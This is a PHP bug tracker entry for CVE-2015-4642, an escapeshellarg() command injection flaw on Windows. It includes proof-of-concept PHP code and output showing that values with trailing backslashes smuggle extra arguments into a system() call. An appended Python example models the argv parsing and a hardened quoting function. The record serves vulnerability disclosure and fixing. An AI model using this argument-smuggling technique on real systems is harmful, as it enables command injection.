Patches: bug69464_php7.patch (last revision 2015-05-18 14:49 UTC by ab@php.net), bug64646_php5_plus_test (last revision 2015-05-18 14:48 UTC by ab@php.net)
             [2015-05-15 23:13 UTC] ab@php.net
 
-Status:      Open
+Status:      Verified
-Assigned To:
+Assigned To: ab
  [2015-05-15 23:13 UTC] ab@php.net
  [2015-05-18 14:48 UTC] ab@php.net
  [2015-05-18 14:49 UTC] ab@php.net
  [2015-05-18 14:51 UTC] ab@php.net
  [2015-06-10 04:40 UTC] stas@php.net
 
-Status: Verified
+Status: Closed
  [2015-06-10 04:40 UTC] stas@php.net
  [2015-06-10 07:42 UTC] tyrael@php.net
  [2015-06-10 08:50 UTC] tyrael@php.net
  [2015-06-10 08:50 UTC] tyrael@php.net
  [2015-06-10 09:15 UTC] jpauli@php.net
  [2015-06-11 12:29 UTC] php at bof dot de
  [2015-06-18 12:31 UTC] kaplan@php.net
 
-CVE-ID:
+CVE-ID: 2015-4642
  [2015-07-01 17:39 UTC] francois dot gagne at gmail dot com
  [2016-07-20 11:38 UTC] davey@php.net
Description:
------------
The following is the report from Takayuki Uchiyama.

This issue is an OS command injection vulnerability.

Do you have a specific case that fails?
I have attached the proof-of-concept code to reproduce this issue.

----------------------------------------------------------------------
PoC Code
----------------------------------------------------------------------
[poc.php]
------------------
<?php
$a = 'a\\';
$b = 'b -c d\\';
var_dump( $a, escapeshellarg($a) );
var_dump( $b, escapeshellarg($b) );
system( 'php arginfo.php ' . escapeshellarg($a) . ' ' . escapeshellarg($b) )
?>
------------------

[arginfo.php]
------------------
<?php
print( "--- ARG INFO ---\n" );
var_dump( $argv );
?>
------------------
----------------------------------------------------------------------
PoC Code
----------------------------------------------------------------------

After running 'php poc.php', if you get the following output, that version of PHP is still vulnerable.

----------------------------------------------------------------------
Output
----------------------------------------------------------------------
string(2) "a\"
string(4) ""a\""
string(7) "b -c d\"
string(9) ""b -c d\""
--- ARG INFO ---
array(4) {
  [0]=>
  string(11) "arginfo.php"
  [1]=>
  string(4) "a" b"
  [2]=>
  string(2) "-c"
  [3]=>
  string(2) "d""
}

[Comment]
The first 4 lines are the output from the var_dump function in poc.php. By comparing this output with the 4-5th lines of poc.php, the output from the escapeshellarg function, it can be seen that an attacker can set a single string that is not "" escaped as a parameter.

Similarly, the 10 lines that follow --- ARG INFO --- are the command line arguments when arginfo.php is called, which are output by the var_dump function in arginfo.php. When comparing this to the way the system function is called (with 2 parameters) in poc.php, it can be seen that the command line interprets it as 3 parameters.
----------------------------------------------------------------------
Output
----------------------------------------------------------------------
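
The three-argument split in the ARG INFO output can be reproduced with a small model of the Microsoft C runtime's argv rules for backslashes and double quotes. This is an added example, not part of the original report and not PHP's patch; `split_argv`, `quote_as_reported` and `quote_hardened` are hypothetical names, and the model covers only backslash/quote handling, not cmd.exe metacharacters.

```python
# Added illustration: function names are hypothetical; the inputs are the
# values of $a and $b from poc.php in the report above.

def split_argv(tail):
    """Split a command tail using the Microsoft C runtime backslash/quote rules."""
    args, cur, quoted, started, i = [], "", False, False, 0
    while i < len(tail):
        ch = tail[i]
        if ch == "\\":
            j = i
            while j < len(tail) and tail[j] == "\\":
                j += 1
            run = j - i
            if j < len(tail) and tail[j] == '"':
                cur += "\\" * (run // 2)      # 2n or 2n+1 backslashes -> n
                if run % 2:                   # odd run: the quote is literal
                    cur += '"'
                    j += 1
            else:
                cur += "\\" * run             # not before a quote: literal
            started, i = True, j
        elif ch == '"':                       # unescaped quote toggles quoting
            quoted, started, i = not quoted, True, i + 1
        elif ch in " \t" and not quoted:      # separator outside quotes
            if started:
                args.append(cur)
            cur, started, i = "", False, i + 1
        else:
            cur, started, i = cur + ch, True, i + 1
    return args + [cur] if started else args

def quote_as_reported(arg):
    """Wrap in double quotes only, as in the escapeshellarg() output in the report."""
    return '"' + arg + '"'

def quote_hardened(arg):
    """Double backslash runs that precede an embedded quote or the closing quote."""
    out, slashes = '"', 0
    for ch in arg:
        if ch == "\\":
            slashes += 1
            continue
        out += "\\" * (2 * slashes + 1 if ch == '"' else slashes) + ch
        slashes = 0
    return out + "\\" * (2 * slashes) + '"'

def demo(quote):
    a, b = "a\\", "b -c d\\"                  # same values as $a and $b
    return split_argv(quote(a) + " " + quote(b))

if __name__ == "__main__":
    print(demo(quote_as_reported))            # three arguments, as in ARG INFO
    print(demo(quote_hardened))               # two arguments, values preserved
```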